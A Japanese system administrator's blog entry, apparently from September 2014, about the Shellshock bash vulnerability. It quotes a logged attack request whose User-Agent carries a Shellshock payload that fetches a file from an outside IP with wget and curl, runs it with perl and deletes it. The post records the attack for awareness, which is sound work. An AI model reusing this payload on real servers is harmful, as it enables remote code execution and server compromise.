«前の日記(Mon, 29 Sep 2014 (平成26年)) 最新 次の日記(Wed, 01 Oct 2014 (平成26年))» 編集 RSS with tsukkomi RSS without tsukkomi

実験的「実験的日記」

Tue, 30 Sep 2014 (平成26年) [長年日記]

_ Shellshock

影響範囲がとてつもなく膨大な脆弱性がまた見つかってしまうとは。自分の管理下のサーバはさっさと bash のパッケージをアップデートして安心、のはずなんだけど、web サーバのアクセスログを見ていたら

"GET /cgi-bin/hi HTTP/1.0" 404 372 "-" "() { :;}; /bin/bash -c \"cd /tmp;wget http://213.5.67.223/ji;curl -O /tmp/ji http://213.5.67.223/jurat; perl /tmp/ji;rm -rf /tmp/ji;rm -rf /tmp/ji*\"

というログを見つけた。脆弱性のある環境だとここまでやりたい放題できちゃうの ?

それと、bash を使っていることがすぐにわかるものは対策できるけれど、ネットワーク機器などでも影響があるものが存在するはずなのでそういうものの情報にアンテナを張り巡らしておかないといけないのがこれまた面倒。

目次
[ツッコミを入れる]
2014年
9月
1 2 3 4 5 6
7 8 9 10 11 12 13
14 15 16 17 18 19 20
21 22 23 24 25 26 27
28 29 30

プロフィール

NT(@ntee)

システム管理者っぽいことをしてます。そしてchouchouholicOrcaorca も好き

サイト内検索

最近のツッコミ

  1. + Toshi(25 Mar 01:22)
  2. + ブチャ猫(14 Feb 23:29)
  3. + リッキー(29 Feb 08:06)
  4. + ブチャ猫(28 Feb 23:19)
  5. + Toshi(14 Sep 14:58)

tagcloud

カテゴリ一覧

Alto | amazon | Android | books | Cats | chef | Chouchou | Curling | Eye-Fi | F1 | GoogleEarth | GP01 | GPS | HYBRID | Hyper-V | IIS7 | Ingress | installmaniax2009 | iPad2 | iPadmini | iPhone | iPod | K-01 | K-7 | Kindle | landsurvey | letsencrypt | LLSpirit | Mac | manga | minatork01 | Mio | mozilla | onboard | Palm | PHS300 | Pixel | Pixel3a | Plagger | Q&A | Reysol | Ruby | rubykaigi2008 | rubykaigi2009 | rubykaigi2010 | rubykaigi2011 | rubykaigi2013 | RubyOnRails | Samba | SecondLife | SXF | T480 | tDiary | tochigirubykaigi01 | tokyorubykaigi01 | tork03 | Twin | twin | UL20A | Vista | W530 | wikibana | Windows10 | Windows7 | Windows8 | XTC800 | チーズ | ワイン | 情報処理技術者試験 | 日記システム | 映画 | 読書会 | 風博士

リンク

Amazonギフト券

«前の日記(Mon, 29 Sep 2014 (平成26年)) 最新 次の日記(Wed, 01 Oct 2014 (平成26年))» 編集
Generated by tDiary version 5.2.3
Powered by Ruby version 3.2.3-p157